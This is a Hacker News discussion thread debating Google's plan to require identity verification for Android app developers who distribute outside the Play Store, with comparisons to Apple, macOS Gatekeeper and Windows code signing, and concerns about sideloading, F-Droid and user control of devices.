> Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store
This is absolutely unacceptable. That's like you having to submit your personal details to Microsoft in order to just run a program on Windows. Absolutely nuts and it will not go as they think it will.
wvenable · 2h ago
I predict Windows will end up going this route before Google backtracks on it.
This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
dhx · 56m ago
As an example of government regulation driving this change, see [1].
This regulation of NSW, Australia considers rooted devices with extra non-Google/non-Apple approved security features such as a duress/wipe PIN (a standard feature of GrapheneOS[2]) as a "dedicated encrypted criminal communication device". How the device is being used doesn't matter. It's how it _could_ be used.
I don't know that it's that simple. Further down that section (1920) in reference [1] reads
"(3) A dedicated encrypted criminal communication device does not include--
(a) a device if--
(i) the device has been designed, modified or equipped with software or security features, and
(ii) a reasonable person would consider the software or security features have been applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection,"
It's not automatic: depending on what a reasonable person thinks and the definition of criminal activity.
dkarl · 34m ago
> applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection
Does the jurisdiction matter? For example, if an activist was using a device to do things in another country that would be legal in Australia but were crimes in the other country.
bloomca · 2h ago
Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all. They understand that as well.
They tried to pull a similar move with WinRT/UWP, but nobody wanted it, so now you can continue with Win32.
They would love to do so, but legacy compatibility is a major business advantage.
wvenable · 1h ago
Microsoft mismanaged it but there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
donmcronald · 1h ago
Yep. They fumbled the ball on step 1 of demand aggregation and we got lucky there was nothing of value for the 99% of users that will blindly take the easy path.
georgemcbay · 6m ago
> there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
Sounds like a nightmare universe.
I've got a hobby app in kotlin multiplatform with iOS/Android/Windows/WASM builds and while I have no issues with Apple's App Store or Google Play, I've had nothing but problems trying to support Windows Store.
The MSIX installer format is horrendous to deal with and the certification process for new releases on Windows Store is always far too long and in the cases they do find issues the reports of the issue that they log are entirely worthless.
I ended up just pulling the app off the Windows Store entirely and making it a downloadable *.msi installer. While the extra layer of presumed integrity of the app being on the Microsoft Store would be nice it wasn't remotely worth the effort for the tiny amount of people who were using the Windows version in the first place, especially given the app is free.
autoexec · 1h ago
> Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
pdntspa · 24m ago
Was it? WOW64 runs 32-bit software fine enough. Or are you talking about 16-bit applications?
ethbr1 · 1h ago
MS is now competing against businesses that see their users as profit centers. (Google, Meta, Apple)
Windows was never going to go another way than this.
Users who care about hardware and/or software freedom should be on linux.
numpad0 · 1h ago
They can just require hash of legacy binaries sent to Microsoft and rubberstamped back. Eventually they'll have a near comprehensive list of legacy binaries in common use, and move to block unknown binaries in circulation as "malware".
dafelst · 1h ago
Microsoft basically already has this (and has for the last ~20 years) as SmartScreen.
reactordev · 30m ago
When was the last time you opened your start menu?
RedComet · 2h ago
The malware excuse is just a palatable false pretense. "We have to protect granny!" Of course, she is getting fleeced by plain scam calls, not somehow sideloading apks onto her idevice, but the truth doesn't help advance their narrative.
steve_taylor · 1h ago
Granny can get scammed using Anydesk, available on Google Play.
yupyupyups · 38m ago
Imagine that methaphorical granny that in an instant catches fire and turns into ash if the governments and large corporations don't have complete control over our lives.
What a lovely granny that totally exists.
imhoguy · 16m ago
My mother in law is constantly worried by some Google Ads in random apps that her phone is hacked...
Gigachad · 1h ago
I suspect it's not grandma getting scammed by APKs, but people installing cracked versions of spotify/youtube/paid games.
fn-mote · 1h ago
> cracked versions of spotify/youtube/paid games
This doesn't make much sense to me.
To put the strongest face on it, by "cracked" youtube, you mean a version that shows the cracker's ads and maybe somehow generates extra clicks (or whatever) so they can get money out of it?
Cracked spotify? In my mind that's just like YouTube, almost entirely server-side. I guess you're talking about hijacking ads here, too? I feel like a "real" crack of Spotify would let you listen to music for free, but that should be impossible (unless their SWE's are incompetent).
miki123211 · 39s ago
Those "cracked" versions often require extra permissions.
My favorite was a local "discover which on your contacts is on the leaked Covid quarantine list[1]" scam app. It claimed that the extra permission dialogs are just fearmongering by Google, who is in cahoots with big pharma, and wants covid to spread to sell more medications.
[1] In fact, no such leak has ever taken place, its existence was just part of the setup for the scam.
867-5309 · 43m ago
no, cracked as in the ad-free premium versions, without paying for them
campground · 59s ago
This is the year of Linux on the Desktop!
rafark · 52m ago
> This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
I would say it’s really 50% platform control, 50% government regulation.
chmod775 · 22m ago
> I predict Windows will end up going this route before Google backtracks on it.
It will not happen in the next 10 years. Right now people would just make generic launchers and then use them to manually load and execute any binary they please. Options include just writing your thingy in a scripting language and run it in node.exe, python.exe, or compile it to WASM, use native bindings of a scripting language, abuse a random verified electron app, ship with and use a random vulnerably driver, etc etc.
Even remotely getting to the point where locking Windows down to that degree would be possible is going to take MS a long time, fighting friction from users all the way. The whole ecosystem would have to change drastically for that sort of control to even be possible and make sense.
The holes aren't really there because it would be so hard to close them in a vacuum, they're there because decades of software people use rely things working the old way. People aren't going to switch to a new OS on which almost nothing works anymore.
martin-t · 2h ago
Malware is the excuse. Control is the goal. Extracting as much money from people while providing less actual value.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
echelon · 1h ago
I just want to say:
I am so sick of Google.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
Sincerely.
autoexec · 1h ago
> I hope the DOJ/FTC split Google into a dozen companies.
There's no chance of that under the current regime. It loves bribery and Google has the money to get whatever they want.
actionfromafar · 2h ago
control=surveillance
autoexec · 1h ago
control is the entire point of the surveillance
Y_Y · 2h ago
This whole thing is getting totally out of surveillance!
Someone should hit surveillance-alt-delete!
Kim_Bruning · 2h ago
I never really got into "phone" progrmaming, always waiting for the shenanigans to die down. But somehow the shanigans have gotten worse and for a significant chunk of the world population, the phone is the only computation device they have at all.
donmcronald · 2h ago
I never got into it because I was convinced developers would refuse to give up control over distribution when Apple started doing it. I wish I was right, but here we are.
worldsayshi · 2h ago
Developers sometimes seem to be as in control as farmers are of the distribution of their produce. There's no absolute rule that gives the owners of large scale distribution networks power over both producer and consumer. It's just laws of convenience. It's easier for everyone to go through a few or just a single common broker.
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
donmcronald · 1h ago
It limits choice. I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem. That means fewer mobile apps even if distribution networks change tomorrow.
brailsafe · 39m ago
> I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem
Seems like it wouldn't be much of a stretch to compare that statement to not starting a business because the economy is unfair. People indeed don't start businesses when the bureaucratic or tax overhead outweighs the financial benefit, but nobody loses sleep over an individual's hypothetical missed opportunity to learn a new skill but them. Doesn't matter to the platform owners unless it also stops being profitable, so it's their job to maintain the profitability for their ecosystem despite whatever barriers they put up.
saganus · 2h ago
Money is a powerful motivator. For better or worse.
rmah · 1h ago
Software distribution control didn't start with phones, it started with game consoles.
lawlessone · 2h ago
i made and released some apps in the early days. Got tired of it and got tired of the reminders from google to add banners, screenshots, submitting icons to support multiple resolutions.. notifications that apps i haven't touched in decade are no longer compatible etc.
so much extra work involved that isn't building the app.
I worry how this will affect fdroid etc.
mid-kid · 3h ago
They have the ecosystem by the balls. Phone manufacturers in recent years have been making unlocking & modifying their devices more and more difficult, google and app developers have been cracking down harder on modded devices by implementing TPM equivalents in the hardware to sign and verify that your system is a google-appproved one, and alternatives still are decades behind in terms of app ecosystem.
I think they might just get away with it.
donmcronald · 2h ago
Don’t worry though, the TPM requirements in everything are for your protection.
cesarb · 2h ago
> and alternatives still are decades behind in terms of app ecosystem.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
SpaghettiCthulu · 2h ago
If you don't mind sharing, which country is that?
Y_Y · 2h ago
It takes less time to search and find that Anatel is the Brazilian telecom agency than it does to type that comment.
They do marvellous things like mandate weird Brazilian Android games on the phone I bought in Brazil.
ripdog · 1h ago
It's incredibly obnoxious when people type "in my country" as if we're all supposed to just... know where they live. It's also incredibly common. Why do people do this?
_aavaa_ · 1h ago
Image asking someone where they’re from only to be told a US state, and only the state.
Y_Y · 1h ago
Apart from Georgia, I don't see how this could be a problem
nozzlegear · 1h ago
Asking where somebody's from and having them respond with the state is not unreasonable -- you can already tell they’re American from the accent. The US is huge, about half of its states have more land area than half of the countries in the world. Asking where someone is from and receiving "the US" in response is about as informative as someone from Europe replying "Europe". Like yeah, obviously, I could tell by your accent, but where in Europe?
watersb · 1h ago
> Image asking someone where they’re from only to be told a US state, and only the state.
Atlanta or Tbilisi?
Vvector · 2h ago
When I google ANATEL, it comes up as Brazil
chasil · 2h ago
Unless they give F-Droid access, the antitrust prosecution will double.
rpdillon · 1h ago
Yeah, I'll just ditch Google over this. The only reason I put up with their crap is because I can actually just install software on my phone. If they take that away, there's no motivation to stay.
OkGoDoIt · 36m ago
And go where? IOS is worse as far as openness and controlling your own hardware. And the Linux phones are not exactly practical for normal use.
rpdillon · 20m ago
If I can't run F-Droid and termux and all that, I have no need for Android supposed freedom. I'll just use an iPhone (it would be the first time!), minimize my use of mobile platforms to the maximum extent I can and stick with Linux laptops.
I'm currently researching Android alternatives, including Librem and Jolla C2, and I'm skeptical that those will be compelling. It's just so sad.
glenstein · 1h ago
I rely on fdroid and am not sure what I'll do with this pixel 6a. I sometimes root, sometimes don't but I may have to get on the lineageos program full time. And I'm hoping for a rumored last batch of pinephone pro phones to be available later this month although I have no illusions about it being a real daily driver.
stockresearcher · 54m ago
fdroid is based in the EU and the Cyber Resilience Act was already going to force them to either make their filters more strict (absolutely prohibit anything with any sort of "monetization"), or start collecting this data.
If they have anything on the platform that is subject to the CRA, they are a distributer:
Use an iPhone, minimize my use of it. Continue to emphasize Linux on all my other devices. Move away from Google and Apple services to as much self-hosting as possible. Leverage TailScale to make my services accessible, globally, without actually exposing them on the internet. I'm just assuming that I will have to have some kind of attested device in order to run banking and payment apps and that might as well be a locked down device like an iPhone.
cyberax · 18m ago
An unofficial build of Android, like Grapheneos. It likely won't be able to install apps from the Play Store, but at that point it might be a blessing.
ocdtrekkie · 2h ago
I would say this is a bold choice for a company whose existing restrictions around third party apps and stores and in-app purchases has already been found illegal. While it doesn't look like they're pushing for it right now, forcing Google to sell Android was something the DOJ has considered as a penalty.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
actionfromafar · 2h ago
Maybe they gave a political donation?
ahartmetz · 30m ago
It may also help to push things one way to prevent them from going the other way.
jojobas · 2h ago
I don't think Google can be blamed for this - their own phones are one of the last which can still be unlocked.
mid-kid · 1h ago
They're also the best equipped to tell if you've done so, and restrict access from critical functionality needed by many in their day-to-day lives if you've done so.
The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
ChadNauseam · 2h ago
true, and recently they deserved a lot of credit for publicly releasing their device trees and drivers. unfortunately, with the 10 series pixels they no longer will be releasing device trees, which makes it much more difficult to maintain custom ROMs
r1ch · 2h ago
This is the same direction that Microsoft is taking Windows. Smart App Control is already rolling out to some regions - no .exe will run without a code signing certificate.
I really wish Microsoft made it cheaper to get a certificate. With Apple you pay $100 a year for any number of certs. Last I looked into it a cert for a single Windows app costs $400+ per year and requires a hardware token.
kiicia · 1h ago
Code signing by pseudonymous key is different that requirement to cede personal data to central registry
ozim · 1h ago
Code signing is somewhat OK as I can get code signing cert using provider in my country that I can go to physically and show their employee my ID.
If google does that then it’s not the worst.
Worst is having to get my ID and all details scanned and processed by Google.
al_borland · 1h ago
> will not go as they think it will.
How will it go? Where are people going to go? People who draw a hard line on this can’t go to iOS for more freedom. Linux phones aren’t ready for prime time. So what’s left? Going back to a flip phone that doesn’t even have the capability of running apps in the same class?
baby · 1h ago
They did it the right way for a very long time and yet people keep buying iPhones, I think I would do the same if I were them, users clearly don't seem to care about openness and freedom to use their devices however they want. I mean, people care about the color of archaic text messages. There is nothing to save.
pier25 · 56m ago
Android has like 70-80% global market share.
reissbaker · 25m ago
And none of that (sadly) is about openness. It's about price. The iOS share of mobile spending is basically the inverse: ~70% iOS, ~30% Android.
bloomca · 2h ago
This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware and you need to go to settings and choose to run anyway (and most people don't even know about it).
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
autoexec · 1h ago
> This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
int_19h · 1h ago
Microsoft does the same exact thing with SmartScreen, except that it has a whitelist for popular binaries.
tomsmeding · 2h ago
Is the right-click -> Open workaround not a thing any more on macOS?
thebitstick · 2h ago
Open -> Click away the error message -> Settings -> Privacy & Security -> Open Anyways -> Open Anyways -> Authenticate -> app actually opens
bithaze · 1h ago
There's a ctrl+open shortcut, if I remember correctly, which may be what the parent comment is referring to.
rpdillon · 1h ago
Nope, they've been making it steadily more difficult with each release. The control open shortcut no longer works.
soxfox42 · 1h ago
As of macOS 15 (I think?), that shortcut stopped working, it will just show the same unverified software warning.
sneak · 37m ago
It requires a trip to a submenu in the Settings app now. You can’t do it simply or easily.
akst · 1h ago
Ultimately it’s them that has market power.
To meaningfully challenge it, developers need to agree to withheld supply like a cartel (illegal?) or union.
I think it’s probably close to the union scenario in an industry with a single employer, as there is that one too many relationship (all developers vs Google). Whereas a cartel is a few suppliers conspiring against all consumers.
I’m not sure developers would go to those lengths, and I’m not sure it would work either as the benefit is too high from defecting from such a coalition.
faangguyindia · 1h ago
Doesn't macOs also requires this when you use stuff like keychain in apps? I remember signing my flutter macOS app with my info using xcode.
He was unable to suggest any pragmatic alternatives. He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
The real heroes are the people that facilitate alternatives, not those who talk, and Stallman was of the talking variety.
aleph_minus_one · 12m ago
> He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
yupyupyups · 1m ago
Sure, now how do you help people who rely on Android/iPhones for communications, maps, banking, and more to protect their freedom?
sltkr · 3h ago
This is what Apple already does, isn't it? Why wouldn't it work for Google too?
indrora · 2h ago
Apple requires you to get a developer account with them.
Nowhere does that require you to go and get a DUNS number, which is onerous for a single developer to do without the infrastructure of a company.
tensor · 12m ago
FWIW I got a DUNS number through apple as a single developer for a corp. It was super easy. If you've already gone through the trouble of setting up a corp, getting the DUNS is trivial by comparison.
andyferris · 2h ago
Never heard of DUNS. It seems to be a US company *Dun & Bradstreet) that provides business intelligence.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangledesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
aerostable_slug · 1h ago
They're trying to control malware. Tying apps that may be malicious to an identity that takes some degree of cost and effort to establish seems sensible in that light.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out of there, but it makes sense given their apparent goal.
o11c · 1h ago
That would be a reasonable argument if it weren't the world's biggest malware vendor doing this.
srcreigh · 31m ago
I'll take some downvotes too. Google software is malware by all definitions of the word. Exfiltration of personal data, unauthorized access and control of personal devices. Data loss when your account gets banned. Deceptive prompts and messaging. They promote SEO spam sites which contain MBs of javascript showing you ads that make them money while you pay for the electricity cost.
They do a lot of other horrible things too, they could expand the definition of malware.
Dragon0 · 1h ago
I've had a business get listed on DUNS; once you're on it, they resell your data forever.
hotstickyballs · 1h ago
It’s not just Apple, lots of federal programs in US require a DUNS number.
watersb · 1h ago
To be clear, Apple does not require a DUNS number for developer registration.
cyanydeez · 2h ago
Yeah, basically this is the rise of computer-credit agencies.
Youc an see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both it's appearance on the app store and any developer who'd program similar.
llm_nerd · 2h ago
While the linked article notes that organizations require a DUNS number seemingly as an aside, personal accounts do not.
Which is exactly the same policy as Apple.
didibus · 2h ago
For me the difference is that Android is an open-source operating system. It sold itself and differentiated itself to users, developers and phone manufacturers as an open ecosystem built on open-source foundations.
Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled under me after giving them my money as Google might be doing.
jonny_eh · 1h ago
> For me the difference is that Android is an open-source operating system
Google Play is not open source. You're still free to sideload on phone that use vanilla open-source android like the Fairphone.
teleforce · 1h ago
>Absolutely nuts and it will not go as they think it will.
Apple will disagree and the first company doing worst than this, and is the world's first trillion dollars company.
Money talks.
altairprime · 2h ago
Ah, then it would be acceptable if an independent third party who does not share data with Google other than Boolean yes/no was used to do this. I expect that’s their long-term plan anyways, to defuse the predictable backlash and externalize the problem and liabilities altogether, once the initial ID harvesting is done.
ozim · 1h ago
I think google has incentive to get that data for themselves so they won’t give that up.
One of those would be in corrupt countries you don’t have the „trusted 3rd party”
cellular · 2h ago
Someone create a website to emulate apk!
asdff · 2h ago
Why would it not go as they think it will? The big guy always wins against the little guy. The fact they make this move suggest they know it is a sure bet.
tgsovlerkhgsel · 3h ago
The problem here is that the EU, which would normally be the only hope to put a stop to bullshit like this, seems to like this.
dwarksidle · 2h ago
Governments are scurred the internet has made everyone realize their governments are crap, their history is gibberish, and it's all being used to screw the next generation. So 60+ year olds are falling back on old tropes
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
maxerickson · 2h ago
It's easy. For the average user, device integrity is more valuable (by a lot) than side loading.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
error503 · 2h ago
Ultimate control over devices you own should be a basic right. Apple's wanton abuse of users and developers via the control they have over their platform, and Google's nipping at their heels, should be evidence enough of that.
Fundamentally, it is a trust issue. Why should I be forced to trust Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
maxerickson · 2h ago
Why should I be forced to trust Google or Apple.
You are not.
It's certainly convenient in this modern world to pay for and use one of their devices though.
plst · 14m ago
You are forced to trust Google or Apple if you want a smartphone. They own the whole market, it's a duopoly. You already have no power to install an OS without such limitations on most smartphones.
Limitations because it's not just protection - you don't get to choose which authorities you trust. Defaulting to manufacturer/OS vendor as the default authority would be ok, but there is no option to choose. Users have no power over their own device. That's not ok even if most choose to never execute it or don't know about it, it will lead to abuse of power.
error503 · 1h ago
That was intended to be a generic 'device manufacturer', not calling out Google and Apple specifically. It's my device. I should control it, full stop. It should simply not be legal for a device manufacturer to lock me out of a device I own, post sale. In the past it wasn't _possible_, so we didn't need to worry about it. But now the tech is at the point where manufacturers can create digital locks which simply cannot be broken, and give them full control of devices they sell (ie. which they no longer own), which are being used in anti-consumer ways.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
dzhiurgis · 1h ago
Modern life without either of these OS (or like a phone number) is pretty difficult, i.e. you can't charge your car or access e-government without an app.
hotstickyballs · 1h ago
I’m willing to sacrifice your rights if it means that there’s less incentive to steal my phone
No comments yet
greazy · 2h ago
Id argue that the average user is not a good barometer. They are okay with slowly being boiled alive. See windows 11 as a good example.
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on android is not a standard setting you can flick on. Is there any data on the number of devices who have this enabled and are falling for hacked apps?
plst · 7m ago
But this is not about device integrity.
I'm all for code signing and integrity verification. We need both technologies on pretty much all devices.
You are just conflating two different issues - side loading has nothing to do with device integrity.
Kim_Bruning · 2h ago
I might partially agree, but the market already has a fantastic, secure option for those users: Apple.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
anticrymactic · 2h ago
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
In what way? Seriously, what benefit is there? (And don't say security...)
3836293648 · 1h ago
Not having social media?
The world would be a much better place if we only had calls and direct messages.
craftkiller · 58m ago
Bro, you forbade exactly the reason this is good for average users. Average users get emails that say:
> you have been infected by 3 viruses, click here in the next 5 minutes or the damage will be permanent
And they believe it. Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
I'm deeply concerned about how this will impact users like us, especially since we're such a small minority that our desires could easily be trampled by the masses, but this is a clear win for the average user.
(And don't make the perfectionist fallacy w.r.t. Google not successfully preventing 100% of malware)
gumby271 · 32m ago
Damn we should just give up on this whole computer thing outright then, seems pretty dangerous. There are plenty of other things we could strip away that would make people much safer than just installing software, that's thinking small!
craftkiller · 7m ago
Stripping away computers entirely would have significant negative impacts. For the *average user*, preventing them from side-loading unsigned apps will have no negative impact.
lucb1e · 2h ago
They're happy in their walled garden, until they don't and discover there is a wall they now can't overcome and learn whose hardware it really is
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
marcosdumay · 1h ago
> For the average user, device integrity is more valuable (by a lot) than side loading.
Right until their devices start to act against their will.
The device integrity is are talking about it integral only to Google and Apple. Not to you.
hn_acc1 · 1h ago
Agreed. Most people don't care that they can't run "unauthorized app XYZ", as long as their bank account / vacation pics / texts don't leak.
Now, that may happen anyway, but they'll give up a TON to avoid that.
Me, I try to avoid using my phone for anything important, use a VPN under Linux at home whenever possible, ad blockers, privacy guard, etc, etc. I can't expect my non-technical family members to do that.
Bad car analogy coming up: MOST drivers benefit more from ABS than the few really, really good race car drivers who can do threshold braking and outbrake ABS - and even then, I doubt it's true for anything but the earliest ABS systems. I'll bet the newest ABS systems are better than almost any human - because they don't have an off day, don't get distracted, etc.
And I get the anger - I'm an old school Atari 800xl / ST / DOS / Linux user who tries to ditch Windows where possible. Restricting things seems heavy-handed - and I don't trust Google in the least. But I would NEVER tell anyone in my family to sideload an app, even though they're all Android users - I don't want that support burden.
EarlKing · 2h ago
Then they should go buy a boomerphone that can make calls and text and nothing else and stop screwing things up for the rest of us.
Aeolun · 2h ago
Average users also benefit from restricting their ability to purchase alcohol or tobacco, but I don’t see anyone suggesting that…
blep-arsh · 1h ago
And people who are financially interested in letting users side-load apps (malicious or otherwise) are good at what they do. I mean, even Russian banks that are banned from the Apple App Store are still finding ways to distribute iPhone apps.
imiric · 2h ago
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that doesn't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
pessimizer · 2h ago
Don't pretend that average users are asked, or that their opinions would matter. Or even that you have some sort of insight into the average user that other people don't have.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
maxerickson · 22m ago
You say this as if the widespread embrace of Apple/locked down Android phones is meaningless, fully a bamboozle with no user choice reflected at all.
incompatible · 1h ago
The EU is some kind of Jekyll and Hyde entity, you can never be sure which way it will go next.
int_19h · 58m ago
EU loves regulation. And it's much easier to regulate things when there are a few large providers that can be mandated to enforce your laws.
TZubiri · 1h ago
Android is much more secure than windows (its architecture was developed decades later from learned lessons)
So yeah, its different and more aecure
globalnode · 1h ago
wont it just open the door for alternatives? linux on pc and ??? on mobile?
Pxtl · 40m ago
Uh, you kind of already do if you don't want to get the scary "unknown publisher" thing, which hides the "yes, I really want to install it" inside the "more info" box. Not even the decency of an "advanced" button.
Installer software signing certificates that will satisfy MS are prohibitively expensive for hobbyists (hundreds per year).
ikiris · 2h ago
You do realize windows already does this right?
bradford · 1h ago
Can you explain in what way Windows already does this?
harikb · 2h ago
So long as they don't make it very hard to get an ID approval, I don't see why people shouldn't know who developed an app.
Currently the entire ecosystem is riddled with malware, spyware, or adware with shady source information and people have no way to verify the data practices
Ms-J · 3h ago
This is the worst thing to happen to technology in recent times since there is only two major phone OS's.
It isn't possible to ban encryption, so the governments have to chip away at security and privacy using these techniques.
"You may also need to upload official government ID."
This won't end well for Google or the governments involved when the people get so angry that they are forced to roll this back. Switch to an alternative phone OS.
tokioyoyo · 2h ago
> This won't end well for Google or the governments involved when the people get so angry
The amount of people this makes angry is so minuscule that it probably wouldn’t even pass one of those theatrical “sign this petition to get the government to discuss it” thingy. Mind you, the only reason the whole side-loading court cases were going forward is because a giganormous company (Epic) wanted to make more money instead of paying the Google/Apple tax. Not because some people were angry.
lukeschlather · 37m ago
This is a lot more complicated than that. I'm not sure how I feel about the demand for government ID. The demand for money that comes with the app stores I find to be a problem and so does the EU, that was a big point of the DMA. It remains to be seen how those regulations play out. Maybe the DMA won't do what I want. But the DMA seems to be aimed at this sort of thing, even if it actually has the same sort of requirements around government ID, it does require openness.
e-clinton · 36m ago
In this instance, quantity isn’t as important. The people it upsets are a loud bunch of a great deal of influence.
crisdias · 2h ago
Yeah. "People" don't care.
wvenable · 2h ago
> This is the worst thing to happen to technology in recent times since there is only two major phone OS's.
I don't think that's it. The desktop OS situation has historically be similar with 2 major large players and a bunch of insignificant ones.
This comes down to user expectation.
jayofdoom · 1h ago
No, it's not similar.
There are two OS platforms for desktop/laptop usage:
MacOS
Windows
These both contain ways to run arbitrary compiled code from an arbitrary source -- like a computer should. Losing this feature of our smartphones should have everyone concerned.
wvenable · 1h ago
Right. The OP's point was that just having 2 major OSes is the problem but it's clearly not because we had that situation with desktops/laptops and they both allow arbitrary code.
bluescrn · 1h ago
> These both contain ways to run arbitrary compiled code from an arbitrary source
And they're both working towards taking that away.
For now we have Linux as a 3rd option, but that only exists so long as there's hardware available that'll let you run it. Can easily imagine a near-future where you can only get 'Windows hardware' or 'Apple hardware' and nothing modern that'll boot a 3rd-party OS.
bpye · 55m ago
Is that really realistic? Apple very specifically allowed booting unsigned, and even non macOS, operating systems on their ARM devices. Sure - they don’t document the hardware, but making it possible was intentional.
wvenable · 28m ago
Yes, making it possible was intentional. But it just goes to show easy it would be for them to remove that option. While they are currently specifically choosing not do that for their own hardware, they could change their mind tomorrow.
For precedent, Microsoft locked down their own ARM hardware to Windows.
maxerickson · 2h ago
What's wrong with loading an alternate OS that isn't Play Protect certified?
buildfocus · 2h ago
Attestation & Play Integrity is having a good go at blocking this: lots of critical software (e.g. the app required to use your bank account) requires certified attested devices, and Google are pushing hard to get as many apps as possible to activate that for "security", making non-Google Android un fixably 2nd tier in functionality.
bsimpson · 2h ago
Doesn't GNU/Linux also have this problem with e.g. Netflix? If you don't pass their spyware, you get shitty streams from video apps and no access to financial accounts.
MrMember · 35m ago
My HTPC runs Linux and when I had Amazon Prime I tried to stream a live event and it wouldn't let me stream it at all. I don't have Prime anymore.
uz3snolc3t6fnrq · 1h ago
ironically, making linux users consider sailing the high seas for actual 4k rips instead of actually paying for the service just to get blocky low bitrate 720p content. so this piracy prevention not only creates more potential pirates, but makes paying customers' lives harder while not affecting the aforementioned pirates, who can now watch it at 4k on any device or program they wish
glenstein · 1h ago
>and Google are pushing hard to get as many apps as possible to activate that for "security"
I'd be interested in further reading on Google's outreach to big banks and major finance CO's ( or others) pushing for device attestation if you have any further reading.
terminalbraid · 2h ago
Most vendors, including the big ones, don't play well with that. Google just revoked open sourcing the Pixel as the reference design which was the strongest option for that. Things like newer Samsungs are black boxes and everyone is actively making it harder to do anything with devices you bought and paid for.
sanex · 2h ago
Soon you won't be able to do this either because most manufacturers are locking down the bootloader.
kotaKat · 2h ago
